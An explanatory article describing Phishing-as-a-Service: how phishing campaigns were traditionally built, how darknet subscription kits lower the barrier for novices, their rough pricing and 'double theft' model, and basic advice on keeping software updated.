The Phishing as a Service (PHaaS)

Phishing is a common way for cybercriminals to dupe people through socially-engineered emails into giving up their credentials to online accounts that can store sensitive data. 

Phishers use these emails—which sometimes fool people by impersonating a trusted company, application or institution–to direct people to specially crafted phishing sites so they can enter credentials, thinking they are doing so for a legitimate reason

Phishing is often a gateway drug into other criminal activity; phishers sell credentials obtained through campaigns on the dark web, and they can be used by ransomware gangs as an entry point into networks to deliver ransomware attacks, among other nefarious activities.


The challenges of Phishing-as-a-Service

Phishing-as-a-Service (PHaaS) is an inclusive form of cybercrime, potentially opening the door for everyone. Now, even a novice can have their own phishing campaign.

In fact, one of the obstacles to entering the world of cybercrime has been on a technical level.

In the past, you had to create your own “hand made” scam, from coding (including developing malware) to hosting spoofed landing pages and selling collected data as part of phishing.

The steps involved a slow, accurate and intense process which consisted of the following steps:

Designing the scam itself

Including the identification of the targets, the elaboration of the best brands to fake, the decision on how the phishing cycle will work (link, atachment, etc.), what you will do with the collected data and so on.

Phishing email design and development

Including setting up email servers, writing content, creating malicious links or attachments.

Creation of the spoof website

Phishing often involves deceiving a person to reveal details such as personal data or financial information.

A forged login page may also be required to collect authentication credentials.

Consumption and use of collected data

The final step, where you figure out what to do with phishing data, whether to sell through a darknet marketplace or group of messaging apps, or use it to hijack an account.

Phishing-as-a-Service is therefore a turning point in the world of cybercrime because it removes a number of the aforementioned steps, especially difficult ones such as hosting and design.

The cybercriminal apprentice will no longer have to hack websites to host their malicious landing pages.

Therefore, by using a phishing option as a ready-made service, cybercrime becomes accessible to everyone.


How Phishing-as-a-Service works

There is a mix of phishing kits from individual tools to fully orchestrated campaigns, available for rent on the darknet.

It is the latter category that is used for phishing as a full-fledged service. Prices for services and kits, starting at around $50 for a simple one-time kit download.

More complicated phishing services, such as Phishing-as-a-Service, have prices ranging from $50 to $80 per month for rental.

Phishing-as-a-Service generally works as a subscription model, similar to renting any other online service such as streaming TV.

This model allows novice users to use professional phishing tools at an affordable price.

Anyone wishing to purchase the tools will go to a marketplace (on the darknet) that offers them as packaged products, in much the same way as any other e-commerce site.

You can choose between different product variants, add them to your cart and pay, which makes Phishing-as-a-Service easy to use even for non-experts.


The double theft technique in PHaaS

The Phishing-as-a-Service service has a double added value, it earns twice: with the rental of the platform (with which the operator obtains the credentials to steal) and then with the sharing of the latter, obtained by those who have hired Phishing-as-a-Service to steal that combo of email and password.

PHaaS differs from traditional phishing kits, sold in a single payment solution to gain access to file packages containing ready-to-use phishing email templates, because there is a servitization of phishing: it is a subscription service and is inspired by a Software-as-a-Service (SaaS) model, while it expands to include integrated hosting sites, email dissemination and credential theft.


How to defend yourself?

The best way to protect yourself from phishing attacks is to never click on any links or open any attachments. But this advice isn’t realistic for most people.

Phishing attacks using malware often rely on software bugs to lure the malware onto your computer.

Usually, once a bug is found, a software manufacturer will release an update to fix it.

This means that older software has more publicly known bugs that could be used to help install malware.

Keeping your software up to date reduces the risk of malware and is a realistic and effective advice.